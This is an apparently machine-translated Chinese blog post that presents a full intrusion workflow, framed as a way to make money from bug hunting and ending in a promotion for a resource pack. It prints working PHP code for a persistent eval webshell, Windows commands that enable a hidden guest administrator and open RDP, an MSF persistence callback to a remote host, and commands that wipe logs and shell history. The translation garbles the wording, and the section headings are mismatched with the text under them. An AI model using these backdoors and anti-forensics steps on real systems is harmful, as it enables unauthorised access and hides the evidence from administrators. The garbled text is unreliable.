挖漏洞经验分享,挖漏洞赚取生活费,7天收益近2200,分享详细方法,给大家看看赚钱的姿势,网安接私活真的很香!

挖漏洞经验分享,挖漏洞赚取生活费,7天收益近2200,分享详细方法,给大家看看赚钱的姿势,网安接私活真的很香!经常有小伙伴问我。
为什么自己总是挖不到漏洞呢?
渗透到底是什么样的流程呢?
所以全网最详细的渗透测试流程来了!!!
全篇

用户代理: *

禁止: /数据/

Ban: /db/

不允许: /admin/

禁止: /经理/

许可:/图片/

“Disallow”参数后面是禁止机器人包含的部件的路径。例如,如果您想阻止机器人将“data”文件夹包含在您网站的目录中,只需添加以下内容:在Disallow 参数后添加/data/。如果要添加其他目录,继续按此格式添加。写入文件后,上传到您网站的根目录,让您的网站远离Google Hack。

机器人文件的目的是防止搜索蜘蛛抓取您想要保护的页面,但是一旦您了解了机器人文件的内容,您就可以确定目标网站上的哪些文件夹不允许您访问。很重要。让我们并排解释这些文件夹。

发现目标网站后台目录的工具有wwwscan、遇剑、dirbuster、cansina等。

4. 侧站及C段扫描

辅助站点通常指向同一服务器上的其他网站,并且某些网站可能不那么容易被黑客攻击。接下来,您可以检查您的网站所在的服务器上是否还有其他网站。如果你还有其他网站,可以先去掉其他网站的web shell,然后提权获取服务器权限,最后自然删除该网站。

对于红蓝冲突和网络保护,C 段扫描更有意义。对于个别网站的渗透测试来说,C段扫描的价值不大。 C网段指向同一个内网网段的其他服务器。例如192.168.0.1,A段为192,B段为168,C段为0,D段为1。 C嗅探是指停止同一个网段C中的一台服务器,即D的1-255网段的服务器,并使用嗅探工具停止该服务器。

5、网站漏洞扫描

网站漏洞扫描是直接检测网站上的漏洞。还有许多用于扫描网站漏洞的工具。 AWVS、AppScan、OWASP-ZAP、nessuss 等但要注意,使用缺失的扫描工具直接扫描网站可能会导致部分网站因一次性流量过多而崩溃。因此,一般最好不要使用漏洞扫描工具来扫描您的网站。此外,未经许可使用Miss Scan扫描网站仍然是违法的。

6. 网站指纹识别

在渗透测试中,获取目标服务器的指纹是非常有必要的。这是因为只有识别相应的Web容器或CMS才能发现与之相关的漏洞并执行相应的入侵操作。 CMS也称为站点范围系统。常见的CMS 包括WordPress、Dedecms、Discuz、PhpWeb、PhpWind、Dvbbs、PhpCMS、ECShop、SiteWeaver、AspCMS、Empire 和Z-Blog。

常见的网站指纹识别工具有whatweb。

7. 网上收集公司机密信息

一旦您确定了一家公司,您就可以上网查询与该公司相关的信息。例如,您公司的电子邮件格式、公司员工姓名以及与您公司相关的信息。此外,您还可以访问Github、码云等代码托管平台查找与此相关的敏感信息。一些粗心的程序员在将代码上传到代码托管平台后并没有解密。导致上传的代码包括数据库连接信息、电子邮件密码和可能泄露的源代码。

8. 收集域名信息

一旦知道了被入侵的目标,即知道了域名,就需要收集该域名对应的IP、域名的Whois信息、子域名等一系列相关信息。域名。

识别与您的域名对应的IP。首先,您需要确定您的域名是否有CDN。访问在线CDN 并查询您的网站。 Ping 多个位置的服务器并使用网站速度测试- 网站站长工具。如果查询到的IP数量大于1,则说明该IP地址不是真实的服务器地址。根据我的经验,如果你有两个或三个地址,并且它们来自同一区域的不同运营商,那么这些地址很可能是服务器的出口地址,并且服务器位于内网。不同运营商的NAT映射。同时使用多个不同的算子进行负载均衡和热备份。如果您有多个IP地址,并且这些IP地址分布在不同的地区,那么基本上可以断定您正在使用CDN。

域名的Whois信息:Whois是一种传输协议,用于查询域名的注册所有者等信息。简单来说,Whois是一个用于查询域名是否被注册以及已注册域名的详细信息(域名所有者、域名注册人等)的数据库。通过Whois查询域名信息。虽然早期的Whois 查询主要通过命令行界面存在,但现在有多种具有简化Web 界面的在线查询工具,可让您同时查询许多不同的数据库。 Web界面查询工具仍然依赖Whois协议向服务器发送查询请求,而命令行界面工具仍然被系统管理员广泛使用。 Whois 通常使用TCP 协议的端口43。每个域名/IP的Whois信息由相应的管理机构存储。

渗透测试

一旦收集到足够的信息,就开始查找网站上的漏洞。检测您的网站是否存在常见的网络漏洞,例如:

SQL注入下载漏洞struts2漏洞JAVA反序列化漏洞

这些都是常见的网站漏洞,网站漏洞还有好几种,这里就不一一列举了。

网站漏洞扫描工具有很多,包括:

AWVSAppScanOwasp-ZapNesus

列出这些类型的网站漏洞扫描工具。还有很多其他的,但这些是最常用的。

三 漏洞探测

当它检测到网站中的漏洞时,它就会利用该漏洞。不同的漏洞需要不同的利用工具。通常很难从单个漏洞获取网站的Web shell。常用的漏洞利用工具包括:

SQL注入—— Sqlmap

XSS 跨站脚本—— Beef-XSS

数据包捕获和修改工具—— Burpsuite 工具、Fidder 数据包捕获软件

文件上传漏洞。当您上传漏洞时,通常会上传一句话木马并获取Web shell、Portal —— Webshell和一句话木马。

但是,一旦您拥有了Web shell,您的一般权限就非常低,您需要提升权限。您可以选择反弹MSF 类型的shell 来提升权限。 Msfvenonm 使用Metasploit Framework (MSF) 生成后门木马。或者,您可以反弹CobaltStrike 类型。 Shell:使用渗透测试神器Cobalt Strike,还可以链接MSF和CobaltStrike。 MSF 和CobaltStrike 还可以链接到其他权限升级(Windows 权限升级、Linux 权限升级)。

四 漏洞利用

一旦您的网站有了Web shell,如果您想检索有关主机的相关信息,则可以将主机的Web shell 替换为MSF shell。如果直接生成木马并在Chopper中运行该木马,您将收到MSF类型的shell。

如果您想发现有关内网主机的更多信息,您需要将该信息传输到内网。由于您无法直接与内网主机通信,因此您必须使用购买的Web shell网站服务器与内网主机通信。

五 内网转发

一旦我们获得了外部网络服务器进入系统的权限,我们就得尽力从服务器上查找必要的信息。

对于Windows 主机,必须更频繁地检查目录,这可能会导致许多意外结果。许多人习惯于将帐户密码等容易忘记的东西存储在笔记或桌面上。您还可以搜索数据库连接文件以查看数据库连接帐户和密码等敏感信息。如果您想获取Windows主机的帐户和密码或自己创建新用户,您这样做是为了避免被网站管理员发现或损害他们的服务器。我尽量不使用远程桌面。由于使用远程桌面比较吵,此时服务器管理员也登录了,如果此时通过远程桌面登录,就会被管理员利用,立即被管理员踢出。如果您确实需要登录远程桌面,请避免创建新用户来登录。激活访客用户,然后将其添加到管理员组并以访客用户身份登录。通过RDP远程登录后,你可以看到其他用户的桌面和其他目录上有什么软件。目的是:

FTP相关软件数据库相关软件打开浏览器并检查您的历史记录,看看是否某些网站保存了您的密码。使用工具查看浏览器中保存的密码

您可以根据主机上找到的帐户和密码创建字典。如果您炸毁了Intranet 上的其他计算机,那么这些计算机很可能具有相同的密码。

net user guest /active:yes #激活访客用户

net localgroup admin guest /add #添加访客用户

net user 访客密码#更改访客用户密码

REG ADD HKLM\\SYSTEM\\CurrentControlSet\\Control\\terminal\’ \’Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f #打开端口3389

对于Linux主机,可以查看开放的端口号、开放的服务以及与其连接的内网主机。检查该目录以查找您网站的数据库连接密码。所以目标就是找到尽可能多的账户密码,这对于炸毁内网账户非常有用。

一旦建立了可以连接到内联网的隧道,您首先需要发现内联网上的资产。但确定内联网的哪些网段可行是一个大问题。您的内网中很可能同时存在10.0.0.0/8、172.16.0.0/16和192.168.0.0/24网段。这需要使用扫描仪进行检测。不建议使用nmap通过代理进行内网扫描。如果您想通过本地主机上的代理进行扫描并且有图形界面,您可以使用RouterScan、Yujian Fast TCP Full Port Scanner或IIS_Scanner。但是,要小心减少线程级别。如果不降低它,代理将很容易崩溃。如果您更喜欢命令行扫描仪,可以使用S Scanner。扫描内网资产和端口开放后,在端口445 上点击MS17_010。但是,如果您通过代理拨打445,请注意,它与您的旧电话号码不同。门户—— 内联网入侵MS17-010。对于端口3389,您可能会遇到CVE-2019-0708浪潮的再次出现,Portal —— CVE-2019-0708远程桌面漏洞。对于1433/3306/6379等端口,可以尝试爆破,如果使用之前收集到的账号密码,成功率会更高。

许可维修

在获得目标主机的许可后,很可能你无法获得那一刻所需要的东西,而必须进行长期的孵化,这需要长期的信息,尤其是在内网期间渗透。收藏。这个时候维护权威就非常重要了。您必须保留您收到的任何现有许可证。

网络后门

1:隐藏后门文件(设置文件隐藏)

2:不朽的马。该脚本每5秒在服务器上创建test.php并写入语句以避免查杀木马。组合attrib 命令来隐藏文件并创建更好的后门。

?php

set_time_limit(0);//程序执行时间

ignore_user_abort(1);//关闭终端后脚本也会执行

unlink(__FILE__);//完整文件名

而(1){

file_put_contents(\’test.php\’,\’?php $a=array($_REQUEST[\’x\’]=\’3\’);

$b=数组键($a)[0];

评估($b);\’);

睡眠(5);

}

3:404页面隐藏后门或将后门代码注入其他嵌入文件中。

注意:上面列出的所有后门技术都可以通过D-Shield 等工具检测到。

Windows系统

1:创建隐藏用户,用户名后添加$

2:将木马文件放置在启动目录下。只要目标机器重新启动,就会连接到遥控器。

3:MSF的持久化模块可以定期运行命令自动将目标机器重新连接到远程控制。但很容易找到

#回弹时间间隔为5秒。它将自动连接到192.168.27 上的端口4444。缺点是容易被杀毒软件检测到。

运行持久性-X -i 5 -p 8888 -r 192.168.10.27

#然后将在目标机器上创建一个新文件C:\\Windows\\TEMP\\CJzhFlNOWa.vbs,并将该服务添加到注册表中。一旦您打开计算机,该服务就会启动。

4:在域环境下,想办法获取krbtgt用户的hash,可用于传票攻击。此外,用户的密码通常不会经常更改。

5:移后门

6:远程桌面会话劫持

Linux系统

1:SSH后门

2:crontab定时任务

3:SSH公钥

4:创建SUID=0的用户

六 内网横向渗透

达到目的后,他们干脆黑掉网站,显示一个黑色页面来炫耀,或者在网站上留下后门,或者闲着没事就在那里闲逛。安装挖矿木马,但是这些东西都是违法的,所以不要做。

我来这里只是为了教你如何去除一些闯入后留下的痕迹。想要完全消除入侵痕迹是不可能的。主要原因是增加了管理员发现入侵者的时间和人力成本。只要管理员想看,无论你怎么清除都可以找到。

最重要的是隐藏你的身份。最好的方法是在闯入前挂断特工的电话,并在闯入后掩盖踪迹。

Windows系统

1:在Windows系统上,您可以使用MSF中的clearev命令清除跟踪。

2:如果3389远程登录,必须清除mstsc痕迹

3:运行命令清除日志。

删除%WINDR%\\* .log /a/s/q/f

4:对于Web 应用程序,找到并删除Web 日志文件。

Linux系统

1:对于Linux系统,如果在获得权限后运行以下命令,则不会记录您输入的命令。

导出HISTFILE=/dev/null 导出HISTSIZE=0

2:删除/var/log目录下的日志文件。

3:对于Web 应用程序,找到并删除Web 日志文件。

七 痕迹清除

渗透测试完成后,您需要为此渗透测试创建渗透测试报告。清楚地写下存在漏洞的地方以及如何修复它们。这使得网站管理员可以根据渗透测试报告修补这些漏洞和风险,并防止黑客的攻击。

八 撰写渗透测试保告

为了帮助大家更好的学习网络安全,我们的编辑准备了任何人都能理解的网络安全入门和进阶学习资料。所有内容即使对于没有基础知识的初学者来说也很容易理解。我不懂编程。所有信息总共282G。如果您想要全套《网络安全入门+高级学习资源包》,请点击这里免费获取(如果扫描二维码有困难)。请在评论区留言领取)~

《网络安全入门+进阶学习资源包》 CSDN礼包:《黑客网络安全入门进阶学习资源包》 免费分享

网络安全(Heike 的红蓝冲突) 了解各个方向的路线

对于刚接触网络安全的学生,我们创建了详细的学习和成长路线图。这可以说是最科学、最系统的学习路线。每个人都可以遵循这个大方向。

学习材料工具包

盒子底部的最佳资料,全面介绍了基础网络安全理论,包括逆向工程、八层网络防御、汇编语言、白帽网络安全、密码学、网络安全协议等等,涵盖了基础知识。紧密结合理论。理论和主流工具的应用实践。帮助读者了解各种主流工具背后的实现机制。

网络安全源码合集+工具包

视频教程

面试问题信息

我们的专用频道收集了京东、360、天融信等公司的试题。大工厂的入口就在拐角处!

总信息量为282G。如果您想要全套网络安全入门+进阶学习资源包,点击这里免费获取(扫描二维码有问题可以在评论里留言)。可获得地区)~

黑客/网络安全大礼包:CSDN大礼包:《黑客网络安全入门进阶学习资源包》 免费分享

如果还有什么关于渗透的问题,可以随时私信我。从现在开始,不要忘记点赞并保存。

#以上是分享挖漏洞的经验,挖漏洞谋生,7天赚近2200,分享详细方法,向大家展示如何赚钱,为网络安全做个人工作,真的很有趣!相关内容来源网络仅供参考。相关信息请参见官方公告。

原创文章,作者:CSDN,如若转载,请注明出处:https://www.sudun.com/ask/93964.html

(0)
CSDN's avatarCSDN
上一篇 2024年7月26日 下午4:15
下一篇 2024年7月26日 下午4:15

相关推荐

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注